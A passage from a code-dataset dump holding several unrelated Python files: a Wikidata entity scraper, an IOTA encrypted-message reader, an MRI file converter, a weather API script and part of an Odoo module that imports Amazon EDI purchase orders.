search_results_have_shown_up = True\n if search_results_have_shown_up is not None:\n break\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 7\")\n if search_results_have_shown_up is not None:\n break\n _logging_print(\"search_results_have_shown_up {}\".format(search_results_have_shown_up))\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 8\")\n if search_results_have_shown_up:\n search_results_divs = await page.querySelectorAll('div.mw-search-result-heading')\n _logging_print(\"len(search_results_divs) {}\".format(len(search_results_divs)))\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 9\")\n for search_results_div in search_results_divs:\n search_results_div_text_content = await page.evaluate('(search_results_div) => search_results_div.textContent', search_results_div)\n _logging_print(\"search_results_div_text_content {}\".format(search_results_div_text_content))\n parsable_text_match = re.match(r'^.+\\(Q[0-9]+\\) +$', search_results_div_text_content)\n _logging_print(\"parsable_text_match {}\".format(parsable_text_match))\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 10\")\n if parsable_text_match:\n parsable_text = parsable_text_match.group()\n parsable_text = parsable_text.replace(')','')\n parsable_text_parts = parsable_text.split('(')\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 11\")\n if len(parsable_text_parts)==2:\n (label, term_id) = parsable_text_parts\n label = label.strip()\n term_id = term_id.strip()\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 12\")\n if _normalize_string_for_wikidata_entity_label_comparison(label) == _normalize_string_for_wikidata_entity_label_comparison(input_string):\n wikidata_entities_corresponding_to_string.append(term_id)\n if len(wikidata_entities_corresponding_to_string)>5:\n break\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 13\")\n except pyppeteer.errors.NetworkError:\n pass\n finally:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 3\")\n _print_all_gnome_shell_processes()\n # await page.close()\n # await browser.close()\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 4\")\n # _print_all_gnome_shell_processes()\n # _logging_print(\"before communicate browser.process {}\".format(browser.process))\n # _, errs = browser.process.communicate()\n # assert errs is None\n # _logging_print(\"after communicate browser.process {}\".format(browser.process))\n # _logging_print(\"errs {}\".format(errs))\n # process_is_still_running = browser.process.poll() is None\n # _logging_print(\"process_is_still_running {}\".format(process_is_still_running))\n # assert not process_is_still_running\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 5\")\n _print_all_gnome_shell_processes()\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 14\")\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 6\")\n _print_all_gnome_shell_processes()\n return wikidata_entities_corresponding_to_string\n\n#@profile\ndef _string_corresponding_commonly_known_entities(input_string: str) -> List[str]:\n _logging_print(\"\")\n _logging_print(\"_string_corresponding_commonly_known_entities\")\n _logging_print(\"input_string {}\".format(input_string))\n result = _indefinitely_attempt_task_until_success(_most_relevant_wikidata_entities_corresponding_to_string, [input_string])\n return result\n\n####################################\n# Wikidata Query Service Utilities #\n####################################\n\nTYPE_TO_ID_MAPPING = bidict.bidict({\n 'Organization': 'Q43229',\n 'Anthroponym': 'Q10856962',\n 'Work': 'Q386724',\n 'Natural Geographic Entity': 'Q27096220',\n})\n\nQUERY_TEMPLATE_FOR_ENTITY_COMMONLY_KNOWN_ISAS = '''\nSELECT ?VALID_GENLS ?TERM\nWHERE \n{{\n VALUES ?TERM {{ {space_separated_term_ids} }}.\n ?TERM wdt:P31 ?IMMEDIATE_GENLS.\n ?IMMEDIATE_GENLS \twdt:P279* ?VALID_GENLS.\n VALUES ?VALID_GENLS {{ '''+' '.join(map(lambda type_string: 'wd:'+type_string, TYPE_TO_ID_MAPPING.values()))+''' }}.\n MINUS {{\n ?TERM wdt:P31 wd:Q4167410 .\n }}\n}}\n'''\n\nWIKI_DATA_QUERY_SERVICE_URI = 'https://query.wikidata.org'\n\n#@profile\ndef _sparql_query_queried_variables(sparql_query:str) -> List[str]:\n queried_variables = []\n sparql_tokens = sparql_query.split()\n assert sparql_tokens[0].lower()=='select'\n for sparql_token in sparql_tokens[1:]:\n if sparql_token[0]=='?':\n queried_variables.append(sparql_token)\n else:\n break\n return queried_variables\n\n#@profile\nasync def _query_wikidata_via_web_scraper(sparql_query:str) -> List[dict]:\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 1\")\n _print_all_gnome_shell_processes()\n results = []\n sparql_query_encoded = urllib.parse.quote(sparql_query)\n uri = WIKI_DATA_QUERY_SERVICE_URI+'/#'+sparql_query_encoded\n page = BROWSER_PAGE\n sparql_query_queried_variables = _sparql_query_queried_variables(sparql_query)\n number_of_variables_queried = len(sparql_query_queried_variables)\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 2\")\n _print_all_gnome_shell_processes()\n try:\n await page.goto(uri)\n selector_query_for_arbitrary_text_inside_query_box = 'span.cm-variable-2'\n await page.waitForSelector(selector_query_for_arbitrary_text_inside_query_box)\n button = await page.querySelector('button#execute-button')\n await page.evaluate('(button) => button.click()', button)\n await page.waitForSelector('div.th-inner.sortable.both')\n column_header_divs = await page.querySelectorAll('div.th-inner.sortable.both')\n assert len(column_header_divs) == number_of_variables_queried\n variable_names = []\n for column_header_div in column_header_divs:\n variable_name = await page.evaluate('(column_header_div) => column_header_div.textContent', column_header_div)\n variable_names.append(variable_name)\n assert sparql_query_queried_variables == list(map(lambda variable_name: '?'+variable_name, variable_names))\n anchors = await page.querySelectorAll('a.item-link')\n result = dict()\n for anchor_index, anchor in enumerate(anchors):\n anchor_variable = variable_names[anchor_index%number_of_variables_queried]\n anchor_link = await page.evaluate('(anchor) => anchor.href', anchor)\n assert len(re.findall(r\"^http://www.wikidata.org/entity/\\w+$\", anchor_link))==1\n entity_id = anchor_link.replace('http://www.wikidata.org/entity/','')\n anchor_variable_with_question_mark_prefix = '?'+anchor_variable\n result[anchor_variable_with_question_mark_prefix] = entity_id\n if (1+anchor_index)%number_of_variables_queried==0:\n assert len(result) == number_of_variables_queried\n results.append(result)\n result = dict()\n except pyppeteer.errors.NetworkError:\n pass\n finally:\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 3\")\n _print_all_gnome_shell_processes()\n # await page.close()\n # await browser.close()\n # _logging_print(\"_query_wikidata_via_web_scraper All shell processes 4\")\n # _print_all_gnome_shell_processes()\n # _logging_print(\"before communicate browser.process {}\".format(browser.process))\n # _, errs = browser.process.communicate()\n # assert errs is None\n # _logging_print(\"after communicate browser.process {}\".format(browser.process))\n # _logging_print(\"errs {}\".format(errs))\n # process_is_still_running = browser.process.poll() is None\n # _logging_print(\"process_is_still_running {}\".format(process_is_still_running))\n # assert not process_is_still_running\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 5\")\n _print_all_gnome_shell_processes()\n return results\n\n###########################\n# Most Abstract Interface #\n###########################\n\n#@profile\ndef execute_sparql_query_via_wikidata(sparql_query:str) -> List[dict]:\n _logging_print(\"\")\n _logging_print(\"execute_sparql_query_via_wikidata\")\n _logging_print(\"sparql_query {}\".format(sparql_query))\n result = _indefinitely_attempt_task_until_success(_query_wikidata_via_web_scraper, [sparql_query])\n return result\n\n#@profile\ndef _find_commonly_known_isas(term_ids_without_item_prefix: List[str]) -> Set[Tuple[str, str]]:\n term_type_pairs = set()\n if len(term_ids_without_item_prefix) != 0:\n term_ids = map(lambda raw_term_id: 'wd:'+raw_term_id, term_ids_without_item_prefix)\n space_separated_term_ids = ' '.join(term_ids)\n sparql_query = QUERY_TEMPLATE_FOR_ENTITY_COMMONLY_KNOWN_ISAS.format(space_separated_term_ids=space_separated_term_ids)\n results = execute_sparql_query_via_wikidata(sparql_query)\n for result in results:\n term = result['?TERM']\n term_type = result['?VALID_GENLS']\n term_type_pair = (term, term_type)\n term_type_pairs.add(term_type_pair)\n return term_type_pairs\n\n#@profile\ndef string_corresponding_wikidata_term_type_pairs(input_string: str) -> Set[Tuple[str, str]]:\n _logging_print(\"string_corresponding_wikidata_term_type_pairs All shell processes 1\")\n _print_all_gnome_shell_processes()\n term_ids = _string_corresponding_commonly_known_entities(input_string)\n _logging_print(\"\")\n _logging_print(\"string_corresponding_wikidata_term_type_pairs\")\n _logging_print(\"input_string {}\".format(input_string))\n _logging_print(\"term_ids {}\".format(term_ids))\n term_type_pairs = _find_commonly_known_isas(term_ids)\n term_type_pairs = [(term, TYPE_TO_ID_MAPPING.inverse[type_id]) for term, type_id in term_type_pairs]\n _logging_print(\"string_corresponding_wikidata_term_type_pairs All shell processes 2\")\n _print_all_gnome_shell_processes()\n return term_type_pairs\n\n#@profile\ndef main():\n _logging_print(\"This module contains utilities for named entity recognition via Wikidata scraping.\")\n _logging_print(\"BROWSER {}\".format(BROWSER))\n for _ in range(10):\n answer = string_corresponding_wikidata_term_type_pairs(\"friar\")\n _logging_print(\"answer {}\".format(answer))\n _logging_print(\"success\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"named_entity_recognition_via_wikidata/named_entity_recognition_via_wikidata.py","file_name":"named_entity_recognition_via_wikidata.py","file_ext":"py","file_size_in_byte":18254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647349776","text":"# In this Example we will see how to read encrypted Messages with asymmetric Key Encryption(rsa)\n\n#First connect to a Node\n# Required Parameters are node, seed\nnode = \"https://nodes.thetangle.org:443\"\nseed = \"YOUR9SEED9GOES9HERE\"\napi = emi.connect_to_node(node,seed)\n\n#now we need the root_address\nroot_address = 'WUGJMZ9DLMWMV9ZBIQCZZS9CUCCCBAMWKXEEEUQMUBXHRGBCSHFSXYABBBTYRMSPFXNFRLD9VSXQWFLSW'\n# Now to read the Message Stream we will use a while loop. When we reach the last Message the loop will end.\nwhile True:\n #First we have to finde the Message\n message = emi.find_message(root_address)\n \n json_file = json.loads(message)\n \n #lets print out the message and next_address\n msg = json_file[\"1\"]\n encrypted_key = json_file[\"2\"]\n print(\"message: \" + str(msg))\n print(\"encrypted key: \" + str(encrypted_key))\n \n decrypted_key = emi.decrypt_pke(encrypted_key,alice_privat_key)\n \n decrypted_message = emi.decrypt_ske(msg,decrypted_key)\n print(\"decrypted key: \" + str(decrypted_key))\n print(\"decrypted_message: \" + str(decrypted_message))\n \n json_message = json.loads(decrypted_message)\n next_address = json_message['next_address']\n signature = json_message['signature']\n message = json_message['message']\n verify = emi.verify_signature(bob_public_key, signature,message)\n print(\"hash algorithmus: \" + str(verify))\n \n # Last step is to place next_addres as root_address\n root_address = next_address\n","sub_path":"main/examples/read_emi_asymmetric.py","file_name":"read_emi_asymmetric.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569981281","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 20 16:22:45 2018\n\n@author: Alex Daniel\n\"\"\"\n\nimport nibabel as nib\nimport sys\nimport numpy as np\n\nfin = sys.argv[1]\nimg = nib.load(fin, strict_sort=True, permit_truncated = True)\nhdr = img.header\ntry:\n nib.save(img, fin[:-3]+'nii.gz')\nexcept:\n print('Unable to convert '+fin+' to nii.gz')\n \nbvals, bvecs = hdr.get_bvals_bvecs()\necho_spacing = (1000.0 * hdr.general_info['water_fat_shift'])/(434.215*(hdr.general_info['epi_factor']+1))\n\nnp.savetxt(fin[:-3]+'bvec',bvecs.T, fmt = '%.3f')\nnp.savetxt(fin[:-3]+'bval',np.expand_dims(bvals,1).T, fmt = '%.0f')\nf = open(fin[:-3]+'echo', 'w')\nf.write('%.6f'%echo_spacing)\nf.close()\n","sub_path":"par_to_nifti.py","file_name":"par_to_nifti.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"289848918","text":"# Install the Python Requests library:\n# `pip install requests`\n\nimport requests\nimport json\n\ndef send_request():\n # Request weather underground\n # GET http://api.wunderground.com/api/380538e19b591277/conditions/q/TH/Bangkok.json\n\n try:\n response = requests.get(\n url=\"http://api.wunderground.com/api/380538e19b591277/conditions/q/TH/Bangkok.json\",\n )\n if response.status_code == 200:\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n return response.content\n else:\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n return None\n\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n return None\n\n\ndef main():\n print(\"Start Program\")\n result = send_request()\n output = json.loads(result)\n print(type(result))\n print(type(output))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"WeatherUG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605591480","text":"# -*- coding: utf-8 -*-\n\nimport base64\nfrom io import StringIO\nimport csv\nimport logging\nimport time\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom tempfile import NamedTemporaryFile\nfrom odoo import models, fields, api, _\nfrom odoo.osv import osv\n#from pdf417gen import encode, render_image\n_logger = logging.getLogger(__name__)\n\nclass sale_order(models.Model):\n _inherit = \"sale.order\"\n \n @api.depends('avc_import_transaction_log_ids.skip_line')\n @api.multi\n def _is_order_is_mismatch(self):\n for order in self:\n for transaction_line in order.avc_import_transaction_log_ids :\n if transaction_line.skip_line:\n order.is_mismatch_order = True\n\n is_amazon_edi_order = fields.Boolean('is Amazon Order')\n amazon_edi_order_id = fields.Char('Amazon Order ID')\n amazon_order_ack_uploaded = fields.Boolean('Amazon order Acknowledgement Uploaded')\n amazon_order_dispatch_advice_uploaded = fields.Boolean('Amazon order Dispatch Advice uploaded')\n avc_import_transaction_log_ids = fields.One2many('avc.transaction.log.line','sale_order_id', string = 'AVC Import Transaction Log',domain=[('operation_type','=','import'),('application','=','sale_order')])\n avc_export_transaction_log_ids = fields.One2many('avc.transaction.log.line','sale_order_id', string = 'AVC Export Transaction Log',domain=[('operation_type','=','export'),('application','=','sale_order_response')])\n vendor_id = fields.Many2one('amazon.vendor.instance', string = \"Vendor\")\n requested_for_routing = fields.Boolean(string = \"Requested for Routing\")\n received_routing_info = fields.Boolean(string = \"Received Routing Information\")\n bill_of_lading_number = fields.Char(string = \"Bill of Lading Number\")\n account_type = fields.Char(string = \"Account Type\")\n is_mismatch_order = fields.Boolean('Is Mismatch Order',compute='_is_order_is_mismatch')\n mismatch_product = fields.Selection([('cancel', 'Cancel'), ('reject', 'Reject'), ('backorder', 'Backorder'), ],\n string='If Product not Found')\n \n # Messing Info details \n \n sender_id = fields.Char('Sender ID',readonly=True)\n recipient_id = fields.Char('Recipient ID',readonly=True)\n message_type = fields.Char('Type',readonly=True)\n msg_version = fields.Char('Version',readonly=True)\n buyer_id = fields.Char('Buyer ID',readonly=True)\n buyer_address = fields.Char('Buyer Address',readonly=True)\n supplier_id = fields.Char('Supplier ID',readonly=True)\n delivery_party_id = fields.Char('Delivery Party ID',readonly=True)\n country_code = fields.Char('Delivery Country',readonly=True)\n invoice_id = fields.Char('Invoice Party ID',readonly=True)\n currancy_code = fields.Char('Currency Code',readonly=True)\n order_id = fields.Char('Sale Order ID',readonly=True) \n vat_number = fields.Char('VAT Registration Number',readonly=True)\n max_delivery_date_ept = fields.Date(string = 'Max Delivery Date')\n delivery_date_ept = fields.Date(string='Delivery Date')\n \n @api.multi\n def action_confirm(self):\n res = super(sale_order,self).action_confirm()\n for order in self:\n if order.is_amazon_edi_order:\n for picking in order.picking_ids:\n carrier_type = order.vendor_id and order.vendor_id.delivery_type\n picking.write({'carrier_type' : carrier_type , 'vendor_id' : order.vendor_id.id})\n \n @api.multi\n def reimport_amazon_po_file(self):\n sale_order_line_obj = self.env['sale.order.line']\n product_obj = self.env['product.product']\n job_id = self.env['avc.file.transaction.log'].search([('sale_order_id','=',self.id)])\n if job_id :\n data = job_id.attachment_id and job_id.attachment_id.datas\n file = StringIO(base64.decodestring(data).decode())\n reader = csv.reader(file,delimiter=\"'\",quotechar='|')\n order_line_info = {}\n line_no = 1\n for segment in reader:\n for seg in segment:\n if seg.startswith('LIN+'):\n order_line_info.update({'Line_'+str(line_no):{}})\n ean = seg.split(\"+\")\n ean = ean[len(ean)-1] \n if ean.upper().find('EN',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n #UP used for Universal Product Code **code edited here**\n elif ean.upper().find('UP',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n line_no += 1\n \n elif seg.startswith('PIA+'):\n code = seg.split(\"+\") \n code = code[2][:-3] if len(code)>2 else ''\n if not order_line_info['Line_'+str(line_no-1)].get('ean',False):\n order_line_info['Line_'+str(line_no-1)].update({'default_code':code})\n \n \n elif seg.startswith('QTY+'):\n qty = seg.split(\":\") \n qty = qty[1] if len(qty)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'qty':qty})\n \n elif seg.startswith('PRI+'):\n price = seg.split(\":\") \n price = price[1] if len(price)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'price':price})\n \n for key,value in order_line_info.items():\n amazon_code = value.get('default_code') or value.get('ean')\n sale_order_line = sale_order_line_obj.search([('amazon_edi_line_code','=',amazon_code),('order_id','=',self.id)])\n if not sale_order_line:\n product = product_obj.search([('amazon_sku','=',amazon_code)])\n if not product:\n product = product_obj.search([('default_code','=',amazon_code)])\n amazon_edi_code = 'SKU'\n if not product :\n product = product_obj.search([('barcode','=',amazon_code)])\n amazon_edi_code = 'barcode'\n if product:\n qty = value.get('qty',0.0)\n price = value.get('price',0.0) \n line=(product,price,amazon_code,qty)\n orderlinevals,product_id, qty_code = self.prepare_order_line_vals(line,self)\n if orderlinevals:\n sale_order_line = sale_order_line_obj.create(orderlinevals)\n remark = amazon_edi_code + ':' + amazon_code\n transaction_line = self.env['avc.transaction.log.line'].search([('job_id','=',job_id.id),('remark','=',remark),('operation_type','=','import')])\n if transaction_line:\n vals = {\n 'message':'Sale Order Line Created',\n 'remark':'sale order id %s'%(self.name or ''),\n 'sale_order_id':self.id,\n 'job_id':job_id.id,\n 'picking_id':False,\n 'back_order_id':False,\n 'sale_order_line_id':sale_order_line.id,\n 'product_id':orderlinevals.get('product_id',''),\n 'package_id':False,\n 'stock_inventory_id':False,\n 'company_id':job_id.company_id.id or False,\n 'user_id':self.env.user.id,\n 'picking_state':'draft',\n 'application':'sale_order',\n 'export_qty':orderlinevals.get('product_uom_qty',''),\n 'processed_qty':orderlinevals.get('product_uom_qty',''),\n 'manually_processed':False,\n 'is_mismatch_detail':False,\n 'skip_line':False,\n 'skip_order':False,\n 'filename':job_id.attachment_id.name,\n 'create_date':datetime.now(),\n 'operation_type':'import',\n 'price':price,\n }\n transaction_line.write(vals)\n \n \n return True\n \n @api.multi\n def export_dispatch_advice(self):\n \"\"\"\n Use: To send Dispatch Advice to Amazon Vendor Central via EDI 856 file. Call manually from Sale Order Form view\n :return: Boolean\n \"\"\"\n self.sync_export_dispatch_advice(sale_order_ids = self)\n return True\n \n @api.model\n def sync_import_amazon_edi_order(self,args={},file_datas=None, ):\n \"\"\"\n Use : For import EDI 850 Purchase Order file\n This method call by cron,\n :param args: arguments pass by cron (vendor_id)\n :param file_datas: If Purchase Order create manualy then here you can send file.\n :return: Boolean\n \"\"\"\n if not args.get('vendor_id'):\n vendor_id = self.env['ir.values'].get_default('avc.config.settings', 'vendor_id')\n else:\n vendor_id = args.get('vendor_id')\n print (\"cron run vendor id : %s\"%(vendor_id))\n vendor_obj = self.env['amazon.vendor.instance'].browse(vendor_id)\n self.import_sales_from_amazon_edi(vendor_obj,file_data=file_datas )\n return True\n \n @api.multi\n def import_sales_from_amazon_edi(self, vendor_ids = None,file_data=None):\n \"\"\"\n Use: Fetch the sale orders file from FTP location,\n format the data into format required by Odoo\n and create the sale in Odoo\n :param vendor_id: Amazon Vendor Central Instance ID\n :param file_data: EDI 850 Purchase Order file\n :return: Boolean\n \"\"\"\n ctx = self._context.copy() or {}\n \n for vendor in vendor_ids:\n self.job_id = None\n self.filename = None\n self.server_filename = None\n self.export_avc_line_id = []\n self.ack_error_lines=[]\n \n filenames_dict ={}\n if file_data:\n imp_file = StringIO(base64.decodestring(file_data))\n file_write = open('/tmp/order_data.txt','wb')\n file_write.writelines(imp_file.getvalue())\n file_write.close()\n file_read = open('/tmp/order_data.txt', \"rU\")\n dialect = csv.Sniffer().sniff(file_read.readline())\n file_read.seek(0)\n reader = csv.reader(file_read,delimiter=\"'\",quotechar='|')\n file_read.seek(0)\n self.process_file_and_prapare_order(file_read)\n else:\n file_to_delete = []\n connection_id = False\n if vendor.is_production_environment:\n ftp_server_id = vendor.production_ftp_connection\n directory_id = vendor.production_po_directory_id\n else :\n ftp_server_id = vendor.test_ftp_connection\n directory_id = vendor.test_po_directory_id\n \n with vendor.get_edi_receive_interface(ftp_server_id,directory_id) \\\n as edi_interface:\n # `filenames` contains a list of filenames to be imported \n filenames_dict = edi_interface.pull_from_ftp(vendor.po_file_import_prefix) \n \n for server_filename, filename in filenames_dict.items():\n \n with open(filename) as file:\n self.job_id = None\n self.filename = filename\n self.server_filename = server_filename\n ctx.update({'filename':server_filename})\n self.process_file_and_prapare_order(vendor,file)\n file_to_delete.append(server_filename) # : Ekta\n \n if self.job_id:\n binary_package = open(filename).read().encode()\n attachment_vals = {\n 'name':server_filename,\n 'datas':base64.encodestring(binary_package),\n 'datas_fname':server_filename,\n 'type':'binary',\n 'res_model': 'avc.file.transaction.log',\n 'res_id':self.job_id.id,\n }\n \n attachment=self.env['ir.attachment'].create(attachment_vals)\n self.job_id.write({'attachment_id' : attachment.id})\n self.job_id.message_post(body=_(\"PO Import File\"),attachment_ids=attachment.ids)\n self.job_id.message_post(body=_((\"Sale Order created %s\"%(self.order_id.name or '') if self.order_id else \"Information Mismatch\")))\n if vendor.auto_confirm_sale_order and vendor.auto_generate_po_ack and self.order_id:\n self.auto_send_poa(sale_order_id = self.order_id)\n\n if file_to_delete:\n with vendor.get_edi_receive_interface(ftp_server_id,directory_id) \\\n as edi_interface:\n edi_interface.sftp_client.chdir(edi_interface.download_dir)\n for filename in file_to_delete:\n edi_interface.delete_from_ftp(filename)\n return True\n\n @api.multi\n def auto_send_poa(self,sale_order_id = None):\n \"\"\"\n USE: This method will call export_po_ack() of stock.picking,\n :param sale_order_id:\n :return: stock.picking's export_po_ack()\n \"\"\"\n if self.instance_id.auto_confirm_sale_order:\n res = sale_order_id.action_confirm()\n if res:\n picking_id = sale_order_id.mapped('picking_ids')\n if picking_id:\n return picking_id[0].export_po_ack()\n else:\n message = \"First of all set Sale Order Auto Confirm as True from Amazon Vendor Central >> Configuration >> Vendor >> Purchase Order Acknowledgement.\"\n _logger.info(message)\n raise osv.except_osv(_('Purchase Order Auto Acknowledgement send error'),_(message))\n\n @api.multi\n def process_file_and_prapare_order(self,vendor,file):\n \"\"\"\n Use: Decode Amazon EDI 850 Purchase Order file and create sale order, sale order lines and required log entries.\n :param file: EDI 850 Purchase Order file\n :return: Boolean\n \"\"\"\n #declaration\n country_obj = self.env['res.country']\n partner_obj = self.env['res.partner'] \n sale_order_obj = self.env['sale.order'] \n sale_order_line_obj = self.env['sale.order.line']\n product_product_obj = self.env['product.product']\n \n delivery_address = {}\n order_line_info = {}\n inv_address_data = {}\n order_info = {}\n message_info = {} \n line_no = 1\n order_line = 0\n total_segment = 0\n self.order_type = ''\n \n #read and seprate file in diffrent part\n for segment in csv.reader(file,delimiter=\"'\",quotechar='|'):\n for seg in segment:\n if seg.startswith('UNB+UNOA') or seg.startswith('UNB+UNOC'):\n header = seg.split(\"+\")\n message_info.update({'sender_id' : header[2][:-3],'recipient_id' : header[3][:-3]})\n total_segment +=1\n \n elif seg.startswith('UNH'):\n msg_type = seg.split(\"+\")\n msg_type = msg_type[2].split(\":\")[0] if len(msg_type)>2 else ''\n message_info.update({'message_type' : msg_type})\n total_segment +=1\n \n elif seg.startswith('BGM+'):\n order_name = seg.split(\"+\")\n order_name = order_name[2] if len(order_name) >= 3 else ''\n order_info.update({'order_name':order_name})\n total_segment +=1\n \n elif seg.startswith('DTM+137'):\n date_seg = seg.split(\":\")\n date_order = datetime.strptime(date_seg[1], '%Y%m%d')\n order_info.update({'date_order':date_order})\n total_segment +=1\n \n elif seg.startswith('DTM+63'):\n date_seg = seg.split(\":\")\n delivery_date = datetime.strptime(date_seg[1], '%Y%m%d')\n order_info.update({'delivery_date':delivery_date})\n message_info.update({'max_delivery_date_ept':delivery_date})\n total_segment +=1\n \n elif seg.startswith('DTM+64'):\n date_seg = seg.split(\":\")\n earliest_date = datetime.strptime(date_seg[1], '%Y%m%d')\n message_info.update({'delivery_date_ept' : earliest_date})\n total_segment +=1\n \n elif seg.startswith('RFF+ADE'):\n order = seg.split(\":\")\n self.order_type = order[1]\n total_segment +=1\n\n elif seg.startswith('RFF+PD'):\n total_segment +=1\n \n elif seg.startswith('NAD+BY'):\n buyer_id = seg.split(\":\")\n buyer_address = buyer_id[0][7:]+':'+buyer_id[2]\n buyer_id = buyer_id and buyer_id[0][7:]\n message_info.update({'buyer_id':buyer_id,'buyer_address':buyer_address})\n total_segment +=1\n continue\n \n elif seg.startswith('NAD+SU'):\n supplier_id = seg.split(\":\")\n supplier_id = supplier_id and supplier_id[0][7:]\n message_info.update({'supplier_id':supplier_id})\n total_segment +=1\n continue\n \n elif seg.startswith('NAD+DP'):\n delivery = seg.split(\"+\")\n delivery_party_id = delivery[2][:-3]\n country_code = delivery[len(delivery)-1]\n country_id = country_obj.search([('code', 'ilike', country_code)])\n message_info.update({'delivery_party_id':delivery_party_id,'country_code':country_code})\n delivery_address = {'name': delivery[4],\n 'street':delivery[5],\n 'city':delivery[6],\n 'zip':delivery[8],\n 'country_id':country_id.id,\n }\n\n total_segment +=1\n continue\n #vendors information get from this part\n elif seg.startswith('NAD+IV'):\n invoice_seg = seg.split(\"+\")\n invoice_id = invoice_seg and invoice_seg[2][:-3]\n message_info.update({'invoice_id':invoice_id})\n if invoice_seg[4].find(\":\") >= 0 :\n customer = invoice_seg[4].split(\":\")\n elif invoice_seg[4].find(\",\") >=0:\n customer = invoice_seg[4].split(\",\")\n country_id = country_obj.search([('code', 'ilike', invoice_seg[9])])\n\n #partner_id = partner_obj.search([('name', '=', customer[0])],)\n partner_id = vendor.so_customer_id\n# if not partner_id:\n# partner_vals = {'name':customer[0],'opt_out':True}\n# partner_id = partner_obj.create(partner_vals)\n inv_address_data = {\n 'type':'invoice',\n 'name': \"%s\" %(customer[0]),\n 'street': customer[1],\n 'street2': invoice_seg[5],\n 'city': invoice_seg[6],\n 'zip': invoice_seg[8],\n 'country_id': country_id[0].id if country_id else False,\n 'parent_id': partner_id.id,\n }\n if delivery_address:\n delivery_address.update({'parent_id': partner_id.id,'type':'delivery'})\n order_info.update({'delivery_address': delivery_address})\n order_info.update({'inv_address_data':inv_address_data}) \n# customer_info.append(inv_address_data)\n total_segment +=1 \n continue \n \n elif seg.startswith('RFF+VA'):\n vat_number = seg.split(\":\")\n message_info.update({'vat_number':vat_number[1]})\n total_segment +=1\n continue\n \n elif seg.startswith('CUX+2'):\n currancy = seg.split(\":\")\n currancy_code = currancy[1]\n currency_id = self.env['res.currency'].search([('name','=',currancy_code)])\n currency_id = currency_id and currency_id[0] or False\n pricelist_id = vendor and vendor.pricelist_id or False\n pricelist_id = pricelist_id and pricelist_id.id or False\n order_info.update({'currency_id':currency_id.id,'pricelist_id':pricelist_id})\n message_info.update({'currancy_code':currancy_code})\n total_segment +=1\n continue\n #sale order line data saprate here\n elif seg.startswith('LIN+'):\n order_line_info.update({'Line_'+str(line_no):{}})\n ean = seg.split(\"+\")\n ean = ean[len(ean)-1] \n if ean.upper().find('EN',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n #UP used for Universal Product Code **code edited here**\n elif ean.upper().find('UP',0,len(ean)) !=-1 and ean.upper().find(':',0,len(ean)) !=-1:\n ean = ean.split(\":\") and ean.split(\":\")[0] or ''\n order_line_info['Line_'+str(line_no)].update({'ean':ean})\n line_no += 1\n order_line +=1\n total_segment +=1\n \n elif seg.startswith('PIA+'):\n code = seg.split(\"+\") \n code = code[2][:-3] if len(code)>2 else ''\n if not order_line_info['Line_'+str(line_no-1)].get('ean',False):\n order_line_info['Line_'+str(line_no-1)].update({'default_code':code})\n total_segment +=1\n \n elif seg.startswith('QTY+'):\n qty = seg.split(\":\") \n qty = qty[1] if len(qty)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'qty':qty})\n total_segment +=1\n \n elif seg.startswith('PRI+'):\n price = seg.split(\":\") \n price = price[1] if len(price)>1 else 0\n order_line_info['Line_'+str(line_no-1)].update({'price':price})\n total_segment +=1 \n \n elif seg.startswith('UNS+S'):\n total_segment +=1\n \n elif seg.startswith('CNT+2'):\n total_line = seg.split(\":\") \n total_line = total_line[1] if len(total_line)>1 else 0\n total_segment +=1\n \n if int(total_line) != order_line:\n raise osv.except_osv(_('Error'), _('Order Line not integrated properly, Please Check order line data in file.')) \n \n elif seg.startswith('UNT+'):\n segments = seg.split(\"+\")\n segments = segments[1]\n if int(segments) != total_segment:\n raise osv.except_osv(_('Error'), _('File not integrated properly, Please Check file data.'))\n\n if not vendor.supplier_id == 